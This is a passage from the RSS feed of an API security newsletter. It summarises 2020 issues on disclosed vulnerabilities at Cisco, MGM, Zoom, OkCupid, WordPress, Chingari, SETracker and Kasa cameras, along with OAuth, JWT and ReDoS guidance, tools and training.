<p><em>The vulnerability exists because different installations share a static encryption key. An attacker could exploit this vulnerability by using the static key to craft a valid session token. A successful exploit could allow the attacker to perform arbitrary actions through the REST API with administrative privileges.&#8221;</em></p></blockquote>
<p>Embarrassingly enough, in the beginning of this year <a href="https://apisecurity.io/issue-65-vulnerabilities-at-siemens-cisco-d-link-owasp-api-security-top-10-out/" target="_blank" rel="noopener noreferrer">Cisco already patched one issue that involved static API key in DCNM</a>. Now the same kind of problem reappears in the very same product. Let&#8217;s hope this does not become a recurring issue.</p>
<p>Do not use static or hard-coded API keys. This is a poor security practice, susceptible to key interception and re-use.</p>
<h2>Vulnerability: MGM Grand</h2>
<p>MGM Grand hotel and casino in Las Vegas reported a data breach earlier in the year. The breach leaked the personal information of 10.6 million guests that had stayed there over the years.</p>
<p>It was not clear in the beginning if only the Las Vegas resort was affected. However, now 142 million records from the parent company, MGM Resorts International, <a href="https://www.cpomagazine.com/cyber-security/new-details-indicate-that-scope-of-the-2019-mgm-data-breach-is-much-bigger-than-expected/" target="_blank" rel="noopener noreferrer">seem to have become available on the dark web</a>, confirming that the scope of the leak is most likely not limited to a single resort. Although the leaked information is not highly sensitive, like credit card or social security information, it can still be used for further attacks.</p>
<p>It looks like the information ended up in the dark web happened because of a data leak at Data Viper, a security platform (ironically) used by MGM. Matt Keil, Director of Product Marketing at Cequence Security, sheds light on the API-side of this latter leak:</p>
<blockquote><p><em>&#8220;Data Viper, a purported security company, lost its database as a result of poor API secure coding practices – the developer left their credentials exposed in an API usage document. The scope of the breach and the technique used, highlight two areas of weak security practices. The first weakness is the fact that many of the databases collected by Data Viper were the result of poor cloud-based implementations – they had little or no access control and authentication configured, or the API keys were left exposed  – so the data was freely accessible to anyone on the web. The second weakness is the developer error of leaving API credentials exposed, an all too common error made by many organizations that are moving (rapidly) to an API-based development methodology.&#8221;</em></p></blockquote>
<p>One more reminder of how critical it is to keep API keys a top secret, closely monitor their use and potential leaks.</p>
<h2>Tools: API path discovery with Chrome Developer Tools</h2>
<p>Chrome Developer Tools have long been popular among web developers. The video below has some tips on how to use the DevTools for penetration testing, including locating API paths on the Memory tab:</p>
<p><iframe loading="lazy" title="Improve Your Hacking Skills Using Devtools | Bug Bounty Tips" width="640" height="360" src="https://www.youtube.com/embed/Y1S5s3FmFsI?start=204&#038;feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<h2>Tutorial: Introduction to GraphQL pentesting</h2>
<p>GraphQL APIs are still less adopted than REST APIs but often used in applications that are optimized for quick retrieval of large amounts of data. And just like REST APIs, GraphQL APIs can be vulnerable to attacks.</p>
<p>Check out this video by Farah Hawa to learn about the basics of GraphQL, data schema discovery with Introspection, and a couple attack examples: Broken object level authorization (IDOR/BOLA) and SQL injections.</p>
<p><iframe loading="lazy" title="HACKING GraphQL FOR BEGINNERS + GIVEAWAY (closed)" width="640" height="360" src="https://www.youtube.com/embed/OQCgmftU-Og?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>We had a list of the most common GraphQL vulnerabilities in our <a href="https://apisecurity.io/issue-82-common-graphql-vulnerabilities-pentesting-insomnia/" target="_blank" rel="noopener noreferrer">issue 82</a>.</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-96-vulnerabilities-cisco-mgm-grand-casino-tutorial-chrome-devtools-pentesting-graphql/">Issue 96: Vulnerabilities at Cisco and MGM Grand Resort, tutorial on Chrome DevTools and pentesting with GraphQL</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 95: Vulnerabilities at Zoom and OkCupid, progress on OAuth 2.1, API Information Disclosure tutorial</title>
		<link>https://apisecurity.io/issue-95-vulnerabilities-zoom-okcupid-progress-oauth-2-1-api-information-disclosure/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 05 Aug 2020 22:00:34 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7141</guid>

					<description><![CDATA[<p>This week, we have recent vulnerabilities in Zoom and OkCupid, progress on the draft for OAuth 2.1, and a video tutorial on discovering leaky APIs. Vulnerability: Zoom Zoom has become the household name of the times, with plenty of face-to face activities moving online. While this helps to keep the bugs of the living kind [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-95-vulnerabilities-zoom-okcupid-progress-oauth-2-1-api-information-disclosure/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-95-vulnerabilities-zoom-okcupid-progress-oauth-2-1-api-information-disclosure/">Issue 95: Vulnerabilities at Zoom and OkCupid, progress on OAuth 2.1, API Information Disclosure tutorial</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have recent vulnerabilities in Zoom and OkCupid, progress on the draft for OAuth 2.1, and a video tutorial on discovering leaky APIs.</p>
<h2>Vulnerability: Zoom</h2>
<p>Zoom has become the household name of the times, with plenty of face-to face activities moving online. While this helps to keep the bugs of the living kind at bay, the online world comes with bugs of their own, and Zoom most certainly is not an exception.</p>
<p>Tom Anthony from SearchPilot found that <a href="https://www.tomanthony.co.uk/blog/zoom-security-exploit-crack-private-meeting-passwords/" target="_blank" rel="noopener noreferrer">lack of rate limiting on a Zoom endpoint allowed to brute-force passwords to any private meetings in Zoom.</a> At that time, the default Zoom passwords were just 6-digit and numeric. This meant that there were only 1 million combinations to try, and the lack of rate limiting made enumeration possible.</p>
<p>This is a classic example on how the issue <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api4-lack-of-resources-and-rate-limiting.htm">OWASP API4:2019 — Lack of resources and rate limiting</a>  effectively becomes <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication.htm">API2:2019 — Broken authentication</a> when rate limiting is not properly implemented on authentication or password reset endpoints. Such endpoints or API paths and operations require special attention. It is not enough to assume that if the overall API has some rate limits these would be sufficient across all operations: authentication-related or not.</p>
<p>Anthony was nice enough to include in his post the exact recommendations how to mitigate the issue that he gave to Zoom:</p>
<ol>
<li>Rate limit GUIDs to a reasonable number of password attempts (e.g 10 [different] failed attempts in an hour for a given meeting)</li>
<li>Rate limit IP addresses, irrespective of GUID, for password attempts (irrespective of meeting ID)</li>
<li>Rate limit or trigger a warning should a given meeting pass a set failure rate for failed password attempts</li>
<li>Fix the CSRF on the Privacy Terms form, so it is harder to automate attacks.</li>
<li>Increase the length of the default password.</li>
</ol>
<p>This is not the first time Zoom has had vulnerabilities that related to meeting IDs and joining meetings. We have covered previous cases, for example, in our issues <a href="https://apisecurity.io/issue-39-vulnerable-local-zoom-webservers-4-mln-macs/">39</a> and <a href="https://apisecurity.io/issue-51-gartner-releases-full-report-api-security/">51</a>.</p>
<h2>Vulnerability: OkCupid</h2>
<p>Popular dating service <a href="https://research.checkpoint.com/2020/hacker-22-seeks-ltr-with-your-data-vulnerabilities-found-on-popular-okcupid-dating-app/" target="_blank" rel="noopener noreferrer">OkCupid has fixed vulnerabilities reported by Checkpoint Research</a>.</p>
<p>Some of the vulnerabilities were not directly API-related, such as deep links in their mobile app or cross-site scripting (XSS). However, these issues were seriously aggravated by the misconfigured Cross-Origin Resource Sharing (CORS) on their API server.</p>
<p>This allowed the researchers to retrieve sensitive personal information (PII) of users using their stolen authentication details.</p>
<p>Lessons learned here: fibs in your API security can make other issues so much worse.</p>
<h2>Standards: Official IEFT draft on OAuth 2.1</h2>
<p>OAuth 2.1 has now reached the milestone of <a href="https://tools.ietf.org/html/draft-ietf-oauth-v2-1-00" target="_blank" rel="noopener noreferrer">an official IETF OAuth working group draft</a>.</p>
<p>OAuth 2.1 is not a brand new standard per se, but rather an update for OAuth 2.0 that incorporates all the current OAuth security best practices:</p>
<ul>
<li>Proof Key for Code Exchange (PKCE) is now required for authorization code grant.</li>
<li>Exact matching is required for redirect URIs.</li>
<li>Refresh tokens are now sender-constrained or one-time use only.</li>
<li>Implicit grant and Resource Owner Password Credentials grant have been removed.</li>
<li>Bearer tokens in query parameters are no longer allowed.</li>
</ul>
<p>Thus, even though there still remains some way to get OAuth 2.1 formally ratified, there is no reason <em>not to</em> start following these security best practices right away.</p>
<p>Check out one of the people behind the proposal, Aaron Parecki, talking about this milestone for OAuth 2.1 in the latest episode of the OAuth Happy Hour:</p>
<p><iframe loading="lazy" title="OAuth Happy Hour Live Q&amp;A" width="640" height="360" src="https://www.youtube.com/embed/sUEBatNmsbY?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<h2>Tutorial: API Information Disclosure</h2>
<p>Here&#8217;s a nice quick video by Heath Adams on locating APIs leaking personal data:</p>
<ul>
<li>How to use Burp Suite to locate all API endpoints that a public website uses.</li>
<li>How to use Google and other tools to locate the API (often OpenAPI) definition and other documentation of the API, and how to use the Wayback Machine to find earlier versions of the APIs.</li>
<li>How to use a dictionary and Burp Intruder to fuzz the endpoints to find undocumented APIs that leak data.</li>
</ul>
<p><iframe loading="lazy" title="Real Bugs - API Information Disclosure" width="640" height="360" src="https://www.youtube.com/embed/X_JTdIkfKow?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-95-vulnerabilities-zoom-okcupid-progress-oauth-2-1-api-information-disclosure/">Issue 95: Vulnerabilities at Zoom and OkCupid, progress on OAuth 2.1, API Information Disclosure tutorial</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 94: Two-day API security training at Black Hat USA</title>
		<link>https://apisecurity.io/issue-94-two-day-api-security-training-black-hat-usa/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 29 Jul 2020 22:00:16 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7117</guid>

					<description><![CDATA[<p>This week, we have a potential username exposure in WordPress APIs, an upcoming API security training at the Black Hat USA 2020 conference, and some industry statistics on the poor security performance of web application firewalls (WAFs) and the importance of API security. Vulnerability: WordPress If you use WordPress, check if the REST API endpoint [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-94-two-day-api-security-training-black-hat-usa/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-94-two-day-api-security-training-black-hat-usa/">Issue 94: Two-day API security training at Black Hat USA</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a potential username exposure in WordPress APIs, an upcoming API security training at the Black Hat USA 2020 conference, and some industry statistics on the poor security performance of web application firewalls (WAFs) and the importance of API security.</p>
<h2>Vulnerability: WordPress</h2>
<p>If you use WordPress, check if the REST API endpoint of WordPress is openly sharing usernames at <code>your_domain/wp-json/wp/v2/users</code>.</p>
<p>Exposing a list of usernames of your site is a <em>very</em> bad idea. If attackers get their hands on that list, it will give them one half of the authentication. They can then launch brute-force attacks on these accounts, trying to use various passwords to find the missing half. As we have said earlier, do not make attackers&#8217; lives easier.</p>
<p>For more details on this vulnerability as well as practical tips what you can do about it, see details in <a href="https://securityboulevard.com/2020/04/how-to-protect-your-website-from-wordpress-brute-force-attacks/" target="_blank" rel="noopener noreferrer">this write-up in Security Boulevard</a>.</p>
<p>As a general note, allowing username enumeration through APIs in <em>any</em> system is <em>not</em> a good idea.</p>
<h2>Training: &#8220;Attacking and Securing APIs&#8221; at Black Hat USA 2020</h2>
<p>For obvious reasons, Black Hat USA 2020 conference is virtual this year. This is great, because it means you can access high-quality security content from the comfort (and safety) of your own home.</p>
<p>One of the best opportunities this provides is attending the 2-day training &#8220;Attacking and Securing APIs&#8221; by Mohammed Aldoub, on August 3—4.</p>
<p>The training is extremely detailed and includes 50+ hands-on labs on web and cloud APIs, microservices, and serverless security. The space is limited, so sign up quickly if you want to participate.</p>
<p>For more details, see the <a href="https://www.blackhat.com/us-20/training/schedule/index.html#attacking-and-securing-apis-18608" target="_blank" rel="noopener noreferrer">full agenda of the course</a> at the conference website.</p>
<h2>Technology wars: WAFs</h2>
<p>In the world of APIs and modern cloud apps, WAFs continue to get bad rap. In the <a href="https://www.darkreading.com/cloud/when-wafs-go-wrong/d/d-id/1338319" target="_blank" rel="noopener noreferrer">latest study by Neustar International Security Council</a>:</p>
<ul>
<li>Four in 10 security professionals reported that at least half of the application-layer attacks lobbied against them ended up bypassing the WAF.</li>
<li>One in 10 said it&#8217;s more like 90% of attacks cruising through the WAF defenses.</li>
<li>One in three said some 50% of network requests made in the past 12 months have been flagged as false positives.</li>
</ul>
<p>The stats do not exactly raise confidence in WAFs&#8217; performance. We have covered earlier surveys among WAF users in our <a href="https://apisecurity.io/issue-32-wafs-failing-api-security-86/" target="_blank" rel="noopener noreferrer">issue 32</a>.</p>
<h2>Industry stats: API security</h2>
<p>Jaikumar Vijayan has compiled <a href="https://techbeacon.com/security/30-app-sec-stats-matter" target="_blank" rel="noopener noreferrer">a list of 30 recent application security stats</a>, and one of them is on API security:</p>
<blockquote><p><em>&#8220;37%: Percentage of respondents who said API security is their top priority for cloud-native apps&#8221;</em></p></blockquote>
<p>Feel free to use it in your presentations as another data point for API security.</p>
<p>The post <a href="https://apisecurity.io/issue-94-two-day-api-security-training-black-hat-usa/">Issue 94: Two-day API security training at Black Hat USA</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 93: API authentication flaw in Chingari, a guide to OAuth Authorization Code grant</title>
		<link>https://apisecurity.io/issue-93-sign-google-flaw-chingari-offensive-guide-oauth-code-grant/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 22 Jul 2020 22:00:31 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7092</guid>

					<description><![CDATA[<p>This week, we have a report of a vulnerability in Google Sign In in a popular Indian video-sharing app, a new guide on typical OAuth implementation flaws, a tool for importing OpenAPI definitions into Burp, and a virtual training on API security. Vulnerability: Chingari Chingari is a popular Indian video-sharing app. With the latest steps [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-93-sign-google-flaw-chingari-offensive-guide-oauth-code-grant/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-93-sign-google-flaw-chingari-offensive-guide-oauth-code-grant/">Issue 93: API authentication flaw in Chingari, a guide to OAuth Authorization Code grant</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a report of a vulnerability in Google Sign In in a popular Indian video-sharing app, a new guide on typical OAuth implementation flaws, a tool for importing OpenAPI definitions into Burp, and a virtual training on API security.</p>
<h2>Vulnerability: Chingari</h2>
<p>Chingari is a popular Indian video-sharing app. With the latest steps by the Indian government to block TikTok and other Chinese apps, Chingari has gathered more than 10 million users.</p>
<p><a href="https://thehackernews.com/2020/07/hack-chingari-app-account.html" target="_blank" rel="noopener noreferrer">Girish Kumar found that the app had a flaw its API authorization</a>. User signs in with Google ID but can then use APIs to fetch profile information of any user in the system using the internal system ID for that user:</p>
<p><a href="https://youtu.be/GuGCfGSNmMQ">https://youtu.be/GuGCfGSNmMQ</a></p>
<p>This is a classic <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm">API1:2019 — Broken object level authorization (BOLA/IDOR)</a> vulnerability from OWASP API Top 10.</p>
<h2>Resources: An offensive guide to the Authorization Code grant</h2>
<p>NCC Group has released a guide that — instead of offending you — provides a useful resource for the OAuth 2.0 Authorization Code flow.</p>
<p><a href="https://research.nccgroup.com/2020/07/07/an-offensive-guide-to-the-authorization-code-grant/" target="_blank" rel="noopener noreferrer">&#8220;An offensive guide to the Authorization Code grant&#8221; by Rami McCarthy</a> provides details of the possible vulnerabilities and how to locate them. The guide includes OAuth vulnerabilities in the different aspects of the flow, such as:</p>
<ul>
<li><code>state</code></li>
<li><code>code</code></li>
<li><code>redirect_url</code></li>
<li><code>client_secret</code></li>
<li>Access token</li>
<li>Clickjacking</li>
</ul>
<p>For each of these, McCarthy provides the typical usage scenario. how attackers (or pen testers) can exploit the vulnerability, and how to detect if this vulnerability is present.</p>
<p>This is a nice addition to the &#8220;Penetration Tester&#8217;s Guide to Evaluating OAuth 2.0 — Authorization Code Grants&#8221; by Maxfield Chen that we covered in our <a href="https://apisecurity.io/issue-85-vulnerability-google-cloud-deployment-manager-pentesters-guide-oauth/" target="_blank" rel="noopener noreferrer">issue 85</a>.</p>
<h2>Tools: Swagger-EZ</h2>
<p><a href="https://rhinosecuritylabs.com/application-security/simplifying-api-pentesting-swagger-files/" target="_blank" rel="noopener noreferrer">Swagger-EZ</a> is a tool by Rhino Security Labs that lets you to import OpenAPI REST API definitions into Burp.</p>
<p>This is not a Burp plugin, but rather a request generator. You proxy the API requests that the tool generates through your browser into Burp. Then, in Burp, you can modify the requests to actually simulate attacks.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7093 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/07/Swagger-EZ.gif" alt="" width="600" height="416" /></p>
<h2>Training: API Attacks Beyond the OWASP API Top 10</h2>
<p>Like so many other events, OWASP AppSec Days are going virtual this year.</p>
<p><a href="https://july.appsecdays.org/" target="_blank" rel="noopener noreferrer">OWASP AppSec Days &#8211; Summer of Security- virtual training courses (July 28-29, 2020)</a> start next week, with several courses running at the same time over the two days. For API security enthusiasts, we would recommend Jason Kent&#8217;s course &#8220;API Attacks Beyond the OWASP API Top 10&#8221;.</p>
<p>The post <a href="https://apisecurity.io/issue-93-sign-google-flaw-chingari-offensive-guide-oauth-code-grant/">Issue 93: API authentication flaw in Chingari, a guide to OAuth Authorization Code grant</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 92: APIs putting dementia patients at risk, OAuth simulators</title>
		<link>https://apisecurity.io/issue-92-apis-putting-dementia-patients-risk-oauth-simulators/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 15 Jul 2020 22:00:05 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7069</guid>

					<description><![CDATA[<p>This week, Pen Test Partners take us to dive deep into why API vulnerabilities are so common in the cheaper smart tracker devices, and we also a vulnerability in TP-LINK&#8217;s Kasa Cameras. On the sunny side of the street, we have helpful simulators to figure out the different OAuth2 and OpenID Connect (OIDC) flows, and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-92-apis-putting-dementia-patients-risk-oauth-simulators/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-92-apis-putting-dementia-patients-risk-oauth-simulators/">Issue 92: APIs putting dementia patients at risk, OAuth simulators</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, Pen Test Partners take us to dive deep into why API vulnerabilities are so common in the cheaper smart tracker devices, and we also a vulnerability in TP-LINK&#8217;s Kasa Cameras. On the sunny side of the street, we have helpful simulators to figure out the different OAuth2 and OpenID Connect (OIDC) flows, and another upcoming webinar on API security.</p>
<h2>Vulnerability: SETracker and smartwatches for dementia patients</h2>
<p>This is one of those API vulnerabilities that can have life-or-death consequences: <a href="https://www.pentestpartners.com/security-blog/hacking-smart-devices-to-convince-dementia-sufferers-to-overdose/" target="_blank" rel="noopener noreferrer">Pen Test Partners found serious API vulnerabilities in SETracker</a>, a backend service behind kids&#8217; smartwatches, car trackers, dementia patients&#8217; devices, to name but a few.</p>
<p>SETracker is owned by a Chinese 3G Electronics, and widely used especially in budget smart tracker devices. Pen Test Partners analyzed the source code of SETracker, and found plenty of vulnerabilities in it.</p>
<p>The familiar concerns — like spying and unsolicited calls — were there, but some of the findings were more concerning. For example, attackers could send notifications on the smartwatches for people suffering from dementia to take medication, which could potentially lead to fatal overdoses. Or, in fact, any kind of notifications to any of the devices, with more potential sad outcomes.</p>
<p>The most serious and over-arching vulnerability, and one that more or less enabled the others, was that the server-to-server API was &#8220;protected&#8221; with a static key <em>and</em> that key was hard-coded in the source code. This meant that attackers could find and reuse the key that allowed them to communicate to SETracker servers like just another trusted server.</p>
<p>3G Electronics was responsive to researchers&#8217; report and the vulnerability has now been fixed.</p>
<p>Pen Test Partners has previously made a similar discovery in the Thinkrace platform for smartwatches and tracker devices, featured in our <a href="https://apisecurity.io/issue-63-microsoft-google-dropping-basic-auth-thinkrace-exposing-47mln-devices/" target="_blank" rel="noopener noreferrer">issue 63</a>. There&#8217;s no shortage of the smart tracker vulnerabilities covered in our previous issues either: car trackers in issues <a href="https://apisecurity.io/issue-27-mycar-vulnerability-serverless-iot-api-security/" target="_blank" rel="noopener noreferrer">27</a> and <a href="https://apisecurity.io/issue-29-oauth2-attacks-car-gps-vulnerabilities-honeypot-stats/" target="_blank" rel="noopener noreferrer">29</a>, and smartwatches in issues <a href="https://apisecurity.io/issue-7-oauth-attacks-vulnerabilities-drones-kids-watches/" target="_blank" rel="noopener noreferrer">7</a>, <a href="https://apisecurity.io/issue-18-security-audits-for-your-api-contracts-google-limits-gmail-api-access/" target="_blank" rel="noopener noreferrer">18</a>, <a href="https://apisecurity.io/issue-19-half-amazon-top-selling-smart-devices-found-vulnerable/" target="_blank" rel="noopener noreferrer">19</a>, <a href="https://apisecurity.io/issue-26-verizon-routers-patched-api-vulnerability/" target="_blank" rel="noopener noreferrer">26</a>, <a href="https://apisecurity.io/issue-27-mycar-vulnerability-serverless-iot-api-security/" target="_blank" rel="noopener noreferrer">27</a>, <a href="https://apisecurity.io/issue-59-vulnerabilities-in-fortinet-truecaller-nykaa-sma-m2-smartwatch/" target="_blank" rel="noopener noreferrer">59</a>, <a href="https://apisecurity.io/issue-78-vulnerabilities-wordpress-rank-math-tapplock-tictoctrack/" target="_blank" rel="noopener noreferrer">78</a>&#8230;</p>
<h2>Vulnerability: TP-LINK Kasa Camera</h2>
<p><a href="https://www.cequence.ai/blog/kasa-camera-vulnerability-discovery/" target="_blank" rel="noopener noreferrer">Jason Kent has found an API vulnerability in Kasa Cameras</a>, owned by TP-LINK.</p>
<p>Authentication errors disclose whether or not an account exists because the error messages are too verbose and give away details. This makes it easier for attackers to enumerate email addresses and perform take-over attacks, like credential stuffing.</p>
<p>Don&#8217;t make attackers&#8217; lives easier: always make sure your API responses — both success and error messages — do not reveal details that help in attacks or figuring out inner workings of your system.</p>
<h2>Tools: OAuth 2.0 simulators</h2>
<p>Want to experiment with different OAuth2 and OIDC flows? Check out these two cool simulators that make it easier to understand the different flows in practice:</p>
<ul>
<li>Aaron Parecki&#8217;s <a href="https://oauth.com/playground/" target="_blank" rel="noopener noreferrer">OAuth 2.0 Playground</a></li>
<li>Philippe De Ryck&#8217;s <a href="https://pragmaticwebsecurity.com/articles/oauthoidc/oauth-flow-simulator.html" target="_blank" rel="noopener noreferrer">OAuth 2.0 Flow Simulator</a></li>
</ul>
<h2>Webinar: OpenAPI for API Security: No need to guess when you KNOW!</h2>
<p>On July 23rd, Isabelle Mauny is hosting a webinar about the use of OpenAPI REST API definitions as the foundation of the positive API security model, and compares this approach with machine learning / AI / anomaly detection.</p>
<p>Click <a href="https://us02web.zoom.us/webinar/register/WN_WhmNRXAQSfqG0dTa0WDTFA" target="_blank" rel="noopener noreferrer">here</a> to enroll and reserve your spot.</p>
<p>The post <a href="https://apisecurity.io/issue-92-apis-putting-dementia-patients-risk-oauth-simulators/">Issue 92: APIs putting dementia patients at risk, OAuth simulators</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 91: Homograph OAuth bypass, common JWT mistakes, ReDos attacks</title>
		<link>https://apisecurity.io/issue-91-homograph-oauth-bypass-common-jwt-mistakes-redos-attacks/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 08 Jul 2020 22:00:45 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7036</guid>

					<description><![CDATA[<p>This week, we check out the recent OAuth bypass at SEMrush, common JWT implementation mistakes and the Semgrep tool, regular expression denial of service (DoS) attacks, and a new online course on OAuth2 and OpenID Connect. Vulnerability: SEMrush OAuth2 implementation can be tricky. SEMrush has fixed an OAuth redirect_uri bypass reported by Yassine Aboukir. The problem [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-91-homograph-oauth-bypass-common-jwt-mistakes-redos-attacks/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-91-homograph-oauth-bypass-common-jwt-mistakes-redos-attacks/">Issue 91: Homograph OAuth bypass, common JWT mistakes, ReDos attacks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out the recent OAuth bypass at SEMrush, common JWT implementation mistakes and the Semgrep tool, regular expression denial of service (DoS) attacks, and a new online course on OAuth2 and OpenID Connect.</p>
<h2>Vulnerability: SEMrush</h2>
<p>OAuth2 implementation can be tricky. <a href="https://hackerone.com/reports/861940" target="_blank" rel="noopener noreferrer">SEMrush has fixed an OAuth <code>redirect_uri</code> bypass reported by Yassine Aboukir</a>.</p>
<p>The problem was in how SEMrush handled international domain names (IDN). IDNs can include non-Latin characters that might <em>look</em> similar or even identical to Latin ones. For example, the Cyrillic <code>е</code> looks exactly like the English <code>e</code>, but it is actually a completely different character.</p>
<p>In the case of SEMrush, the vulnerability was that their code did not differentiate non-Latin characters from Latin ones. Instead, homographs, such as <code>sémrush</code>, <code>sêmrush</code>, <code>sèmrûsh</code>, or <code>šemrush</code>, were considered to be identical to <code>semrush</code>.</p>
<p>Thus, attackers could register a domain like <code>oauth.šemrush.com</code> (or <code>oauth.xn--emrush-9jb.com</code>) and make an OAuth call where the <code>redirect_uri</code> parameter was set to their domain. The system accepted this just fine and the redirect took the user to the attackers&#8217; domain (<code>oauth.šemrush.com</code>), not the vendor one (<code>oauth.semrush.com</code>).</p>
<p>Be careful when you implement OAuth2: use well-established and trusted solutions, and make sure that your validation for strings is strict.</p>
<h2>Tooling: Common JWT mistakes and the Semgrep tool</h2>
<p>JSON Web Token (JWT) security has been a recurring theme in this newsletter. For example, see the JWT security videos in <a href="https://apisecurity.io/issue-72-vulnerabilities-in-wordpress-themerex-addons-and-voatz-facebook-postmortem-jwt-talks-openapi-specification-3-0-3/" target="_blank" rel="noopener noreferrer">issue 72</a>, or check out the JWT toolkit in <a href="https://apisecurity.io/issue-88-jwt-pentesting-api-discovery-present-future-openapi/" target="_blank" rel="noopener noreferrer">issue 88</a>. Not to abandon a good theme, this week we have a recent summary of the recurring issues with JWT.</p>
<p><a href="https://r2c.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/" target="_blank" rel="noopener noreferrer">Vasilii Ermilov from R2C has analyzed 2,000 node package manager (npm) modules for  different JWT security implementation flaws</a>. The following is the list he compiled on the JWT mistakes that cropped up most often:</p>
<ul>
<li>Hardcoded secrets</li>
<li>Allowing the <code>none</code> algorithm for signing</li>
<li>Incorrectly verified tokens (or no verification at all)</li>
<li>Sensitive data exposure</li>
</ul>
<p>Ermilov provides code examples for each of these mistakes, as well as rules to catch these issues with his company&#8217;s tool, <a href="https://semgrep.live/" target="_blank" rel="noopener noreferrer">Semgrep</a>.</p>
<h2>Cheat sheet: Preventing regex DoS</h2>
<p>Regular expressions (regex) are a common way to define string parameter patterns for API inputs. However, the regex language is extremely flexible, and can easily be abused to create expressions that require enormous amounts of memory and compute power to evaluate. Such attacks are known as Regular Expressions Denial of Service (ReDoS).</p>
<figure style="width: 564px" class="wp-caption alignnone"><img loading="lazy" decoding="async" src="https://miro.medium.com/max/1128/1*u4JTY4pnCJIPMSe97IW87g.png" alt="Image for post" width="564" height="224" /><figcaption class="wp-caption-text"><em>Regular expressions are used all over the web stack, from client-side code to firewalls to back-end applications to database queries. If one of these regexes is (1) slow, and (2) processes dangerous input, then it is vulnerable to ReDoS. For example, Cloudflare’s firewall had a ReDoS issue in 2019, and Stack Overflow’s back-end had a ReDoS issue in 2016.</em></figcaption></figure>
<p>James Davis has put together <a href="https://levelup.gitconnected.com/the-regular-expression-denial-of-service-redos-cheat-sheet-a78d0ed7d865" target="_blank" rel="noopener noreferrer">a cheat-sheet for ReDos attacks and how to mitigate them</a>. A good resource to check out!</p>
<h2>Training: OAuth2 and OpenID Connect</h2>
<p>OAuth2 and OpenID Connect (OIDC) continue to be misunderstood and misimplemented, which leads to API vulnerabilities.</p>
